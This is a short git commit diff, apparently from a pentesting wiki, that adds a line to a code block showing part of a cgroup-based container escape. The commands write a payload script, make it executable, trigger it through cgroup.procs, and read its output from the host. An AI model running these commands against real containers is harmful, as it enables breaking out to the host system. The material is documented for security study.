GitBook: [master] one page modified

This commit is contained in:
CPol 2020-12-14 17:45:17 +00:00 committed by gitbook-bot
parent 230c44e808
commit b5807d3669
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF

View File

@ -35,6 +35,7 @@ echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
head /output
```
{% endcode %}